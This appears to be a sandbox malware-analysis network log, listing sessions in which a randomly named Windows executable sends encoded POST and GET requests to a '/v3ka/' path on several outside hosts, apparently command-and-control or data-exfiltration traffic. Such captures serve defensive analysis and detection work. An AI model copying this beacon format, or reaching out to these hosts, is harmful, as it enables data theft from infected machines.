51 51 70 6e 52 66 47 62 56 69 70 6c 6d 36 46 66 48 55 79 76 53 39 64 39 4e 6c 31 44 53 4a 4d 6f 6c 30 3d Data Ascii: nf8dPP8p=WZ7pvUHO5mWQKs59w9YDE8V1AF9NiMJuj0wymK2LrF3yZIw3n5xvMM2nFFez3EtSTbjcGE1uSxE5P5VqqnmlkWrfchiZxKxwUAObr8LOHi12grtejJXmq4Ie6X/VQz74rN3p1QjGdqwMH7OCP93xpNWExtSq4eP2weZV6Fq8a7u0+wvSqklwqFRU/p8MkM6KnynkM0m5vSsrWUPrI4PoEakP2zREtRdM3P1ROGbDenaxsYR2QwKCOSatCfjAM0grqql0UTyjcXAWwS6j2/40YpiTlMF1lKZjGsVYFCN7W2WDB/2Q1MyhTysxPYHcnbojW2AFt3M5se/Q84VfoWFdpHgS6aZCN/1t6buvTMH/WNXW4lwArdmaaonAJ0xApcEFiRS4Cg1MVI50r3n8XFp7pxp00NWBwUux+G5uDBQpuqONPWpFN79iS7mBeNYhkMAKN32E1X7WarEhZpd8WYIa473gHg1RMWB3kZoKUT1oJo16pMVwCzqh8QQpnRfGbViplm6FfHUyvS9d9Nl1DSJMol0=
Feb 28, 2024 15:46:09.512959003 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 28 Feb 2024 14:46:09 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: br Data Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.20	50246	194.191.24.38	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:12.014769077 CET	12860	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.b-r-consulting.ch Origin: http://www.b-r-consulting.ch Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 52933 Cache-Control: max-age=0 Referer: http://www.b-r-consulting.ch/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 57 5a 37 70 76 55 48 4f 35 6d 57 51 4b 73 35 39 77 39 59 44 45 38 56 31 41 46 39 4e 69 4d 4a 75 6a 30 77 79 6d 4b 32 4c 72 46 50 79 59 2b 45 33 6d 61 5a 76 43 73 32 6e 65 46 65 32 33 45 74 71 54 62 62 59 47 42 73 4d 53 30 41 35 50 6f 46 71 71 56 65 6c 68 57 72 61 57 42 69 68 6e 36 78 6b 55 41 43 50 72 38 4f 31 48 53 70 32 6e 73 4a 65 30 71 2f 6e 31 34 4a 58 36 58 2f 5a 55 7a 37 61 72 4e 37 35 31 51 76 47 64 6f 45 4d 45 75 43 43 4d 75 66 78 6b 39 57 44 6d 39 53 76 32 2b 50 58 77 65 63 6d 36 46 71 43 61 35 65 30 2b 33 37 53 74 56 6c 7a 71 6c 52 55 32 4a 38 4c 70 73 6d 4f 6e 79 37 43 4d 33 36 35 76 51 63 72 57 30 50 72 4e 63 54 6e 54 4b 6b 4a 38 54 52 54 70 52 52 55 33 50 68 72 4f 48 2f 44 65 55 6d 78 75 72 35 32 52 52 4b 43 4e 79 61 76 64 50 6a 49 44 55 68 36 71 71 31 6f 55 58 44 55 63 51 34 57 79 79 61 6a 6b 71 4d 33 4d 35 69 56 71 73 46 61 76 61 46 76 47 71 31 45 46 43 4d 6d 57 30 36 44 43 4c 4b 51 30 4e 79 69 51 69 73 32 57 49 48 7a 74 37 30 35 57 32 63 4e 74 33 30 70 73 64 7a 51 75 6f 56 66 73 78 35 65 6a 33 67 56 34 61 59 50 56 66 30 31 36 62 53 56 54 50 4c 42 57 65 54 57 34 56 67 41 76 4e 6d 5a 52 6f 6e 45 43 55 78 43 74 63 45 46 69 51 76 4a 43 67 4a 4d 56 35 42 30 72 46 76 38 53 57 78 37 36 68 70 74 30 4e 58 66 77 55 6a 61 2b 47 67 2f 44 42 41 51 75 73 75 4e 42 69 4e 46 4d 36 39 68 41 37 6d 49 4e 64 5a 33 37 38 4e 51 4e 78 54 4a 31 54 66 73 62 5a 51 68 59 70 4e 38 46 49 49 5a 39 62 33 37 54 77 31 44 47 33 39 37 6b 59 46 2f 55 54 42 34 4a 72 6c 36 70 39 6c 75 46 41 53 68 6e 68 67 61 6e 78 6e 44 59 44 75 75 38 32 54 35 51 56 41 74 70 44 4a 5a 78 4e 34 36 5a 77 35 4e 33 68 79 4a 67 35 65 47 59 78 34 7a 53 77 59 61 2b 78 75 6b 4b 78 67 2b 55 55 6a 32 74 57 57 63 4e 58 59 6d 42 66 79 68 7a 64 75 43 71 4e 36 59 71 36 5a 4a 50 30 45 62 45 33 44 58 77 55 56 71 56 55 51 32 36 4a 52 63 78 77 75 76 79 4d 2f 31 70 66 4d 6f 55 2b 33 54 55 38 32 51 41 38 32 32 4f 45 2f 64 53 6b 76 62 38 76 62 37 59 61 2f 73 50 4d 70 6a 31 7a 4f 61 5a 57 58 5a 46 44 6c 4a 36 39 34 79 77 49 55 4b 4a 32 6e 48 4d 49 7a 42 45 39 35 52 46 47 6f 56 32 67 2b 37 34 6f 70 77 78 53 50 70 4d 44 50 41 44 62 35 74 77 57 72 6a 67 56 66 67 35 44 4b 35 75 59 6e 36 61 70 56 59 5a 7a 73 74 62 53 66 34 51 56 31 79 70 34 6e 63 4e 6e 6d 4f 59 58 38 4b 70 32 78 48 70 62 2f 52 67 4f 6a 58 74 34 37 55 37 6e 30 4a 39 7a 7a 78 38 50 56 72 62 47 6e 38 6c 2f 65 37 70 55 59 76 6f 46 6a 50 61 79 6b 34 62 49 51 38 4a 2b 74 69 58 6f 68 36 5a 6b 53 51 6f 6d 56 72 46 44 68 78 2b 65 45 4e 64 79 6e 4e 4b 2f 49 63 5a 46 78 51 58 2f 4c 4d 58 49 63 71 43 49 66 72 2b 6e 42 56 75 4e 43 46 6a 7a 78 7a 6d 45 52 61 6f 56 56 41 7a 32 33 6a 77 51 58 73 46 2f 41 46 75 32 75 38 50 46 2b 31 67 38 6e 2f 6b 71 4c 68 4f 48 74 44 61 55 32 66 34 70 78 4f 78 38 39 74 43 73 45 2f 5a 46 74 50 6c 63 52 6e 61 57 68 42 43 4c 77 59 47 5a 52 32 55 56 59 4f 57 69 51 4d 62 36 64 75 4d 6c 39 34 42 35 6c 33 37 4f 33 48 55 46 4b 76 36 37 43 57 46 73 66 7a 64 7a 6a 4f 70 43 4a 41 38 53 52 6c 57 75 49 36 6a 6a 34 54 72 52 65 78 56 79 4f 52 70 2b 56 4f 47 45 67 78 53 76 61 77 6e 70 2f 76 52 4d 37 45 38 57 7a 4f 32 62 6d 75 6b 72 63 6c 6c 49 65 43 78 51 43 56 30 53 78 56 77 6d 39 6c 61 74 65 52 4e 30 50 31 6a 4f 48 43 52 41 37 35 35 53 6e 31 4f 63 66 43 64 67 6b 78 4a 4c 52 68 39 41 6c 37 73 2b 37 58 48 2b 61 65 4f 56 2b 69 79 35 61 52 56 54 47 74 33 44 64 4b 36 4f 7a 53 4e 35 44 47 55 7a 79 74 57 65 49 50 74 75 78 37 2b 4e 30 36 33 66 78 37 46 78 31 2f 56 38 2b 41 55 77 6e 65 77 59 76 35 44 52 6e 46 74 6b 47 35 75 42 6e 56 4d 7a 63 4d 61 61 39 61 59 33 42 49 74 49 6b 4c 59 39 6d 48 45 4e 56 31 79 42 74 43 6c 41 64 62 6c 44 51 4f 57 53 31 39 58 51 34 71 71 6e 55 61 67 6a 30 66 6c 4c 41 2f 55 76 77 6b 72 44 43 31 30 30 38 63 75 67 5a 57 44 56 67 78 57 62 7a 57 4b 45 63 52 71 62 4d 51 6e 57 6f 33 46 71 6f 46 5a 55 30 43 78 4a 4b 6a 72 36 4d 47 68 6a 6b 77 6c 75 71 6d 47 37 2f 4c 79 49 76 36 6a 59 61 67 46 49 4f 4e 6e 66 38 79 65 65 6a 67 6f 4a 55 67 4f 4a 66 33 74 41 37 63 55 4f 46 48 75 63 71 4c 52 72 75 2b 70 33 72 55 4d 69 2b 46 66 78 77 55 38 35 41 33 77 7a 76 73 66 36 75 33 2b 4e Data Ascii: nf8dPP8p=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
Feb 28, 2024 15:46:12.334423065 CET	2572	OUT	Data Raw: 6b 45 68 71 4e 34 36 5a 77 58 2f 54 73 53 58 61 4f 4b 48 66 6c 32 47 75 7a 62 48 7a 53 72 59 36 67 34 4b 43 73 49 5a 37 31 4c 30 4d 75 38 6e 30 38 66 4b 79 2f 6b 4f 37 4f 4e 65 39 69 33 7a 50 51 71 46 30 4a 55 66 58 4b 59 72 32 63 76 49 62 62 67 Data Ascii: kEhqN46ZwX/TsSXaOKHfl2GuzbHzSrY6g4KCsIZ71L0Mu8n08fKy/kO7ONe9i3zPQqF0JUfXKYr2cvIbbgckvV/MuUec22yIXhZ6N2DZmMD/T6QQ02lYqYGoTyUmcnJzJpHkeF+R9/cK9DgXw/kewUH9abz26VcJHL1Jn38vCg12WaOXpqp9CmC8TJ2kwGatr6l2CTTbTPVBpIOdjqBfrQNxIZYukXmFCQ3DI5lOrI0biTYxi6b
Feb 28, 2024 15:46:12.334568977 CET	15432	OUT	Data Raw: 2f 49 44 70 6b 4f 38 48 33 4a 48 43 30 44 36 50 4c 77 55 35 7a 38 62 74 6b 30 52 64 35 36 56 4c 7a 77 37 4c 78 78 4d 65 74 51 53 30 74 6b 75 76 6f 47 48 6f 70 43 38 74 71 61 46 74 6e 65 42 33 68 66 56 55 4c 56 30 4d 58 4a 35 34 32 36 4e 6d 55 75 Data Ascii: /IDpkO8H3JHC0D6PLwU5z8btk0Rd56VLzw7LxxMetQS0tkuvoGHopC8tqaFtneB3hfVULV0MXJ5426NmUu6242y74gAGcpIErpm1/eSRrBmYYl93XOGDOtpwYK5spOibiRynxlhTm242IyIefuF2jLm4Goxc+EG3/gfpp9pT/11n1+KaQnBEWIXxEE7FooUY2kKR4S6M/NZ+loyo2GPbaknsL4+SQZ+vRDuu8owviMWMZ3b9czS
Feb 28, 2024 15:46:12.334892988 CET	7716	OUT	Data Raw: 47 45 6e 62 53 4b 71 6e 59 66 6e 4f 44 4a 55 79 61 45 6b 78 44 4e 53 37 36 2f 43 47 74 6a 6f 51 48 44 74 69 44 64 6e 74 59 7a 72 67 2f 77 35 32 50 77 62 5a 59 61 77 39 56 49 4d 2f 35 6a 7a 66 58 53 4c 37 34 78 50 33 6e 66 70 68 30 68 71 70 62 4a Data Ascii: GEnbSKqnYfnODJUyaEkxDNS76/CGtjoQHDtiDdntYzrg/w52PwbZYaw9VIM/5jzfXSL74xP3nfph0hqpbJz77WIGrOMHOuFdFTF2hTqhwqCwQZFJPYOoMrh2K4eyhDzbt+gTQ6FGg6YkUBEps1KLdoENqqTG/ATjflseHIy0w6d+g+VcGPqqhWw9S6khPrIzkXf5JCN4y9QNd81rXcw6BCL7EumjXOJ8hWFiMIAN5sFkZO+4Ofp
Feb 28, 2024 15:46:12.654174089 CET	2572	OUT	Data Raw: 63 74 53 48 32 57 47 67 33 37 54 71 73 2f 6b 2b 2b 4d 4f 51 78 6e 50 79 75 71 4e 34 4e 41 6e 44 33 68 55 52 73 32 61 4d 72 6d 64 4e 65 43 73 4b 53 47 4c 4a 37 6d 78 43 4d 6e 79 6d 71 76 68 68 39 6b 4f 77 53 4b 76 34 46 4f 30 31 76 63 35 5a 52 2b Data Ascii: ctSH2WGg37Tqs/k++MOQxnPyuqN4NAnD3hURs2aMrmdNeCsKSGLJ7mxCMnymqvhh9kOwSKv4FO01vc5ZR+DNmedCQNE6b5iu4CFl91HHgGfXaLCf3WflHuIb+gpWNRyuLR6IQZfKb5B19sHFjzPGr/tuFtcVmeJiW93t6OwvXukWy13DQRpNlDUhBAUK6U224MGCDBz2hRDkcRF5P18U9Lis3EJoF/tFZlKVrTqV41+8g5q1gt9
Feb 28, 2024 15:46:12.654355049 CET	12317	OUT	Data Raw: 51 47 78 30 67 39 38 79 51 4e 6c 67 76 78 4d 58 73 59 71 5a 2b 5a 78 4b 63 38 74 6b 73 4a 2f 2b 44 52 59 66 69 46 6b 53 59 5a 4c 4e 6c 68 6f 30 68 2f 43 6d 42 38 44 69 75 6f 50 41 50 77 61 4a 59 6e 49 5a 76 54 64 62 58 59 47 43 4e 4e 70 38 4e 53 Data Ascii: QGx0g98yQNlgvxMXsYqZ+ZxKc8tksJ/+DRYfiFkSYZLNlho0h/CmB8DiuoPAPwaJYnIZvTdbXYGCNNp8NSmGb0xFycyvTEhI7jNp6x14y66Ghs21GipAk0ok9i28MAZUix+wkQCqmzNFNgEhLGs2FiEGrUrMo2Z4KdCSaBsstwtYMrENLV5soNpTcNCBT5z+fKbgrHH8LQPFAaDy4FG8SQPg443HPOuW9N99NIBdw84nhQKiTXh
Feb 28, 2024 15:46:12.978441954 CET	376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 28 Feb 2024 14:46:12 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: br Data Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.20	50247	194.191.24.38	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:14.855633974 CET	466	OUT	GET /v3ka/?nf8dPP8p=bbTJsjbns1egJ9JAh959MNYhMlBhishDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw9+PVZyBlhOQ45aXm/eU=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.b-r-consulting.ch Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:46:15.178976059 CET	389	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 28 Feb 2024 14:46:15 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 203 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 33 6b 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v3ka/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.11.20	50248	84.32.84.32	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:21.093451023 CET	754	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.teenpattimasterapp.org Origin: http://www.teenpattimasterapp.org Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.teenpattimasterapp.org/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 68 67 54 6c 49 6c 79 43 6a 69 32 78 56 6c 71 6d 57 6d 7a 51 50 66 5a 7a 2f 4b 43 69 78 2f 6b 55 50 6f 62 65 31 31 61 6d 45 58 55 50 56 2f 46 44 51 2f 51 45 51 70 48 49 55 34 4e 4c 66 6d 61 56 78 61 75 33 65 4c 41 33 63 30 51 6b 41 50 47 35 37 72 67 47 6e 6b 54 63 56 4b 62 73 77 66 79 6e 52 42 2f 52 47 70 35 30 38 78 38 6a 47 68 43 58 65 55 38 56 38 37 6e 68 48 4e 65 71 63 5a 5a 4e 53 35 67 42 68 54 76 65 77 43 69 4c 4a 72 7a 6b 33 48 6e 59 79 49 44 2f 54 45 48 72 44 4c 4a 4a 70 54 48 67 65 6d 33 5a 34 6d 50 38 39 7a 57 4d 31 74 36 52 4c 4e 7a 30 4c 76 67 54 7a 32 52 50 74 67 3d 3d Data Ascii: nf8dPP8p=hgTlIlyCji2xVlqmWmzQPfZz/KCix/kUPobe11amEXUPV/FDQ/QEQpHIU4NLfmaVxau3eLA3c0QkAPG57rgGnkTcVKbswfynRB/RGp508x8jGhCXeU8V87nhHNeqcZZNS5gBhTvewCiLJrzk3HnYyID/TEHrDLJJpTHgem3Z4mP89zWM1t6RLNz0LvgTz2RPtg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.11.20	50249	84.32.84.32	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:23.938435078 CET	1094	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.teenpattimasterapp.org Origin: http://www.teenpattimasterapp.org Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 545 Cache-Control: max-age=0 Referer: http://www.teenpattimasterapp.org/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 68 67 54 6c 49 6c 79 43 6a 69 32 78 48 30 61 6d 52 46 4c 51 49 2f 5a 79 7a 71 43 69 36 66 6b 59 50 6f 48 65 31 78 43 50 46 6c 77 50 51 75 31 44 52 39 34 45 54 70 48 49 47 59 4e 4f 52 47 61 65 78 61 71 52 65 4a 55 33 63 33 73 6b 61 61 61 35 7a 37 67 46 6f 45 54 64 55 4b 62 68 68 50 79 58 52 42 37 6e 47 72 46 30 38 41 67 6a 41 54 61 58 50 51 51 4b 32 4c 6e 6a 42 4e 65 70 4b 70 5a 4c 53 35 73 4a 68 52 2f 6b 77 78 2b 4c 4a 4c 54 6b 6c 58 6e 5a 72 49 43 35 65 6b 47 47 49 62 38 51 67 52 76 63 50 6b 62 43 2b 46 54 30 78 55 48 41 30 76 4b 43 65 73 6d 4f 46 62 4a 62 36 6e 73 41 37 66 43 69 7a 73 51 71 6f 78 2f 70 42 70 42 43 79 75 49 73 71 6e 49 6d 56 36 62 38 4c 75 67 6d 6a 55 79 6f 75 4b 53 61 30 43 66 4e 41 70 74 6c 54 54 44 57 67 4a 66 6c 42 59 72 54 30 31 4a 74 44 4e 6e 6a 36 51 46 4c 63 39 54 31 46 6e 76 68 65 63 6e 37 67 75 6d 35 64 74 4c 32 49 51 